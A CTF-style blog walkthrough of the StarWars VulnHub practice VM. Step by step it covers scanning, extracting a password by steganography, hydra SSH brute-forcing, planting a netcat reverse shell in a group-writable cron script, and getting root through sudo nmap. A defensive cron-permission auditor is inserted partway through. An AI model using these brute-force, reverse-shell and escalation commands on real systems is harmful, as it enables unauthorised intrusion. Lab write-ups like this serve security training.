StarWars Vulnhub Walkthrough

StarWars is a beginner-level virtual machine created by Sir Logic. This is another boot-to-root challenge. It's available at VulnHub for penetration testing practice, and you can download it from here.

Network Scanning

Let's start by discovering our target's IP address with an ARP scan using the netdiscover command. There are many ARP scanning tools, but I always use Nmap and netdiscover.

sudo netdiscover

Now that we have our target IP address, the next step is to scan the target machine with Nmap to find its open ports and services.

nmap -sV -sC 192.168.43.233

As we can see from this output, two ports are open: 22 and 80. We have the 22/SSH service as well as an 80/HTTP service on the server.

Enumeration

We open a web browser and navigate to the host IP address, where we see two identical images and a comment ( Password you shall find ).

http://192.168.43.233

After reading the page source, we found a base64 string, but it was not useful. Then I downloaded the image to my local system and started examining it for steganography; I used several tools, but none of them gave me the right output.

I was stuck here until I found a Ruby tool, zsteg (it detects stegano-hidden data in PNG and BMP files). You can install the tool with the command below.

sudo gem install zsteg
zsteg -a yoga.png

After extracting the hidden data from the image, we found a password, but we still need a username. For more details I started enumerating port 80 again, and by checking the robots.txt file we found a directory, /r2d2.

http://192.168.43.233/robots.txt

There was nothing useful there, so I created a word-list with the cewl tool using the command below.

sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt
http://192.168.43.233/r2d2

I tried the word-list as SSH usernames. After spending an hour we couldn't find any valid username, so I searched Google for ( StarWars wordlist ), found a word-list (you can download it here: the wordlists link), and tried again with the new user list.

sudo vi user.txt
hydra -L user.txt -p "babyYoda123" 192.168.43.233 ssh

After 217 tries hydra discovered a valid username and password, so now we try to log in to the SSH server.

ssh [email protected]

Now I start enumerating the user's home directory and find a .secrets directory containing a note file. After reading note.txt I see a hint: Anakin is a cewl kid.

ls -lsa
cd .secrets/
ls
cat note.txt

I found a group named anakin with two users in it, Darth and skywalker.

cat /etc/group |grep anakin

Again I ran the cewl tool to create a new word-list, created a usernames file with these commands, and started SSH brute-forcing again.

sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt
ls
sudo echo -e "Darth\nskywalker" > /tmp/user.txt
sudo hydra -L /tmp/user.txt -P word-pass.txt ssh://192.168.43.233

As we see, we again found a valid username and password. I changed our current user with the su ( switch user ) command and again found a .secrets note.txt file.

su skywalker
cd ~/
ls -lsa
cd .secrets/
cat note.txt

After reading the note.txt file we moved to Darth's home directory, where I found a Python file. Reading it, we see a message that this file is run automatically every minute and that the anakin group has read-write permission on it.

cd /home/Darth/
cd .secrets/
cat evil.py
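From the defender's side, the weakness here is a scheduled script that a whole group can rewrite. The script below is an added example, not the walkthrough's or the VM's code: it parses system-crontab lines, looks up the permissions of each scheduled script and its directory, and flags anything group- or world-writable. The sample crontab and file modes are constructed to mirror the evil.py situation; the paths and the user names are assumptions.

```python
"""Added example (not the walkthrough's code): flag cron-run scripts others can edit."""
import os
import re
import stat
# System crontab line: five schedule fields, the run-as user, then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
# Absolute paths to script files inside the command (a simple heuristic).
SCRIPT_PATH = re.compile(r"(/[^\s;|&]+\.(?:py|sh|pl|rb))")


def real_mode(path):
    # st_mode of a live path, or None if it does not exist.
    try:
        return os.lstat(path).st_mode
    except FileNotFoundError:
        return None


def loose_perms(mode):
    # Group or world write bit set: any member of the group (or anyone) can edit it.
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(crontab_text, mode_of=real_mode):
    """Return (run_as_user, path, reason) tuples; mode_of(path) -> st_mode or None."""
    findings = []
    for line in crontab_text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#"):
            continue
        user = m.group("user")
        for path in SCRIPT_PATH.findall(m.group("cmd")):
            mode = mode_of(path)
            if mode is None:
                findings.append((user, path, "missing script: check who can create it"))
            elif loose_perms(mode):
                findings.append((user, path, "script writable by group/others"))
            parent = mode_of(os.path.dirname(path))
            # A sticky, writable directory such as /tmp is a weaker signal; skip it.
            if parent and loose_perms(parent) and not parent & stat.S_ISVTX:
                findings.append((user, path, "parent dir writable by group/others"))
    return findings


# Constructed sample modelled on the walkthrough: evil.py is group-writable (0664).
SAMPLE_CRONTAB = ("* * * * * Darth /usr/bin/python3 /home/Darth/.secrets/evil.py\n"
                  "0 3 * * * root /usr/local/sbin/backup.sh\n")
SAMPLE_MODES = {"/home/Darth/.secrets/evil.py": 0o100664, "/home/Darth/.secrets": 0o040750,
                "/usr/local/sbin/backup.sh": 0o100755, "/usr/local/sbin": 0o040755}


def demo():
    # Run the audit against the constructed sample instead of the live /etc/crontab.
    return audit_crontab(SAMPLE_CRONTAB, SAMPLE_MODES.get)
```

Pointing `audit_crontab` at the contents of a real /etc/crontab with the default `mode_of` performs the same check against the live filesystem.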

So I edited it to create a netcat reverse shell using these commands, but first we open a new console window and start a netcat listener on any port.

nc -lvp 77
echo -e 'import os\nos.system("nc 192.168.43.103 77 -e /bin/bash")' > evil.py
cat evil.py

After a minute we got a reverse connection from the target machine, and our user changed from skywalker to Darth.

sudo nc -lvp 77
sudo -l

Privilege Escalation

Let's run the sudo -l command to enumerate whether this user can run any application with root privileges without a password. We found that the Darth user can run the Nmap command. I had already read about Nmap privilege escalation, so without wasting time I ran the privilege escalation commands one by one.

var=$(mktemp)
echo 'os.execute("/bin/bash")' > $var
sudo nmap --script=$var

Now we have a root shell on the target machine. Let's move to the root directory and read our final flag.

cd /root
ls
cat flag.txt

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
